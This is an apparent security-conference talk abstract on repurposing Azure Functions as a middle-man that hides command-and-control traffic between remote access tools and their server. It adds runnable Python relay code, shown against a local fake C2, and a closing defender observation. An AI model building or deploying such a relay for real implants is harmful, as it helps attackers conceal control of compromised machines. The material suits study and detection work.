Thursday, March 12 • 1:00pm - 1:50pm
Building Functional C2 with Azure

Building out command and control (C2) infrastructure has gone through several iterations over the years. The original build-out most attackers used involved obtaining a server (by compromise or purchase) to host the C2 and registering a domain to direct all implant traffic to an endpoint they controlled. Attackers, and the offensive security community, have since expanded their arsenal and begun using cloud services via domain fronting to hide C2 traffic inside legitimate web services. Defenders, however, have also been developing techniques to detect these methods.

As with any cat-and-mouse game, attackers will continue to innovate. Microsoft Azure offers functionality beyond CDN access and virtual machines; in particular, Azure Functions lets a user execute "serverless code" when a specific action, or trigger, occurs. We've developed a method that uses Azure Functions as a middle-man for command and control. Azure Functions not only allows remote access tools (RATs) to authenticate to a C2 server, but also hides all traffic between the RAT and the C2 server itself.

Azure Functions offers benefits similar to domain fronting without the server resources that an Apache- or iptables-based redirector requires. Attendees will leave this talk understanding how an attacker can repurpose Azure Functions for command and control on top of legitimate cloud services.
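To make the relay idea concrete, the following is an added illustration and not code from the talk or from the speakers' tooling. It implements the forwarding logic an HTTP-triggered Function would run: take the implant's request, strip the hop-by-hop and Host headers, re-issue it to the real C2 backend, and hand the backend's response back unchanged. The Azure binding is sketched only in a comment (the `azure.functions` `HttpRequest`/`HttpResponse` shape is assumed), and the backend is a constructed local stand-in so the whole thing runs offline; the `/beacon` route, the `example-app.azurewebsites.net` hostname and the `rat-01` beacon are all made up for the demo.

```python
import http.server
import json
import threading
import urllib.error
import urllib.request

# Headers a relay must not copy through: RFC 7230 hop-by-hop headers, plus Host
# and Content-Length, which urllib sets afresh for the new backend connection.
STRIP_HEADERS = {
    "host", "connection", "keep-alive", "proxy-authenticate",
    "proxy-authorization", "te", "trailer", "transfer-encoding",
    "upgrade", "content-length",
}


def build_forward_request(method, path, headers, body, backend_base):
    """Rebuild the implant's request so it is addressed to the real C2.

    Method, path, body and ordinary headers are preserved; only the headers
    in STRIP_HEADERS are dropped so the backend sees its own hostname.
    """
    url = backend_base.rstrip("/") + "/" + path.lstrip("/")
    fwd = {k: v for k, v in headers.items() if k.lower() not in STRIP_HEADERS}
    return urllib.request.Request(url, data=body or None, headers=fwd, method=method)


def relay(method, path, headers, body, backend_base):
    """Forward one request to the backend; return (status, headers, body)."""
    req = build_forward_request(method, path, headers, body, backend_base)
    try:
        with urllib.request.urlopen(req, timeout=5) as resp:
            return resp.status, dict(resp.headers), resp.read()
    except urllib.error.HTTPError as e:
        # Backend error responses are passed through rather than masked.
        return e.code, dict(e.headers), e.read()


# Assumed Azure Functions entry point (not runnable here; requires the
# azure.functions package and a route binding such as "{*path}" in function.json):
#
# def main(req: func.HttpRequest) -> func.HttpResponse:
#     status, hdrs, body = relay(req.method, req.route_params.get("path", ""),
#                                dict(req.headers), req.get_body(), BACKEND_C2)
#     return func.HttpResponse(body, status_code=status, headers=hdrs)


class FakeC2Handler(http.server.BaseHTTPRequestHandler):
    """Constructed stand-in for the operator's C2: records what it sees and
    answers each beacon with a tasking blob."""

    def do_POST(self):
        length = int(self.headers.get("Content-Length", 0))
        beacon = json.loads(self.rfile.read(length) or b"{}")
        self.server.seen.append({
            "path": self.path,
            "host": self.headers.get("Host"),
            "connection": self.headers.get("Connection"),
            "beacon": beacon,
        })
        payload = json.dumps({"task": "whoami", "for": beacon.get("id")}).encode()
        self.send_response(200)
        self.send_header("Content-Type", "application/json")
        self.send_header("Content-Length", str(len(payload)))
        self.end_headers()
        self.wfile.write(payload)

    def log_message(self, *args):  # keep the demo quiet
        pass


def start_fake_c2():
    srv = http.server.HTTPServer(("127.0.0.1", 0), FakeC2Handler)
    srv.seen = []
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    return srv, "http://127.0.0.1:%d" % srv.server_address[1]


def demo():
    """Push one constructed beacon through the relay; return what each side saw."""
    c2, backend = start_fake_c2()
    try:
        # Headers as they would arrive at the Function from the implant (constructed).
        rat_headers = {
            "Host": "example-app.azurewebsites.net",
            "Content-Type": "application/json",
            "Connection": "keep-alive",
        }
        beacon = json.dumps({"id": "rat-01", "hostname": "WS-042"}).encode()
        status, _, body = relay("POST", "/beacon", rat_headers, beacon, backend)
        return {"status": status, "task": json.loads(body), "c2_saw": c2.seen[0]}
    finally:
        c2.shutdown()
        c2.server_close()


if __name__ == "__main__":
    print(json.dumps(demo(), indent=2))
```

The point the demo makes is the one the abstract describes: the implant only ever talks to the Function's hostname, and the C2 only ever sees a connection from the Function's egress, with the implant's Host and connection headers rewritten in between. For a defender, the corollary is that the observable on the victim side is HTTPS to a tenant-controlled `*.azurewebsites.net` name, so baselining which Function hostnames an environment legitimately talks to matters more than blocking the platform.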